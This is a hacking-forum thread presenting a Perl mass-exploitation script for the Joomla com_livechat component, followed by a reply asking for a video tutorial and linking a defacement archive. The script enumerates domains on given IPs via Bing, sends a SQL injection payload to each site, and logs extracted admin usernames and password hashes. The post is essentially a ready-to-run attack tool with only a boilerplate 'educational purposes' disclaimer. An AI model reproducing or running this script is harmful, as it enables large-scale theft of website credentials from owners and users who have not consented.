Hello There, Guest! Login Register
Logo
Dismiss this notice
MaDLeeTs is not responsible for any attacks that are carried out on networks, websites or servers.
MaDLeeTs staff members cannot be held responsible.
All information on this forum is for educational purposes only.


Com_livechat Exploit Checker[perl]

  • 0 Vote(s) - 0 Average


01-12-2014, 05:53 PM #1
v30sharp Offline Junior Member **
Registered
Posts:25 Threads:11 Joined:May 2013 Reputation: 0
Mood: None
Code:
#!/usr/bin/perl
use HTTP::Request;
use LWP::Simple;
$|=1;
print '
____________________________________________________________________
|                                                                    |
|                    Com_livechat Exploit Checker                    |
|                          By Mr_AnarShi-T                           |
|                        idea : By Securlty                         |
|                         Www.HackTeacH.Org                          |
|____________________________________________________________________|
';

        print "\n\n[+] Enter List File Ips  : ";
        $host=<STDIN>;
        chomp($host);
        print "\n[+] Enter Name File To Save : ";
        $save=<STDIN>;
        chomp($save);
        open (SITE, "<$host") || die "[-] Can't open the List of site file !";
        @SITE = <SITE>;
        close SITE;
        foreach  $xp (@SITE) {
        chomp $xp;
        $ip = $xp;
        chomp ($ip);
        %group;


        if ( $ip !~ /^(\d+)\.(\d+)\.(\d+)\.(\d+)$/ ) {
                print "# Skiping $ip\n";

        }

        my $page = 0;


        while (1) {


                my $content = get("http://www.bing.com/search?q=ip:$ip&first=$page&FORM=PERE") or die("Error getting output\n");
                my $status = keys %group;
                while ( $content =~ /<cite>[:\/\/]*([\w\.\-]+)[\w+\/\.\-_:\?=]*<\/cite>/g) {
                        $group{$1} = undef;
                }
                last if ($status == keys %group);
                $page = $page + 10;
        }

        print "\n\n[+] Working On $ip\n\n";
        open (IN,">$save");
        foreach  $host (keys %group) {
        print IN "$host\n";
        }
        close(IN);
        open (BB, "<$save") || die "[-] Can't open the List of site file !";
        my @BB = <BB>;
        close BB;
        foreach  $webs (@BB) {
        chomp $webs;
         $target = $webs;
$vulpath="/administrator/components/com_livechat/getChat.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password))),3,4%20from%20jos_users";
$url = "http://" . $target."/" . $vulpath;
$reqjoom=HTTP::Request->new(GET=>$url);
$uajoom=LWP::UserAgent->new();
$uajoom->timeout(0);
$responsejoom=$uajoom->request($reqjoom);
if ($responsejoom->content=~m/"><user>(.*?):(.*?)<\/user>/g){
my ($username,$password) = ($1,$2);
print "[+] Target : $target\n\n";
print "[*] User Name : $username";
print "\n[*] Password : $password\n\n";
open(BEN,">>log.txt");
print BEN "$target\n";
print BEN "User Name : $username\n";
print BEN "Password : $password\n\n";
close(BEN);
sleep 1;
next;
}
}
}

01-28-2014, 07:08 PM #2
d3ViLfac3 Offline Junior Member **
Registered
Posts:7 Threads:1 Joined:Oct 2013 Reputation: 0
Mood: None
can you give a video
i need this Biggrinsmiley

Contack Me [At] :
jember-hacker[Dot]org
[email protected]
###################################
http://www.zone-h.org/archive/notifier=d3ViLfac3
###################################






Forum Jump:


Users browsing this thread:1 Guest(s)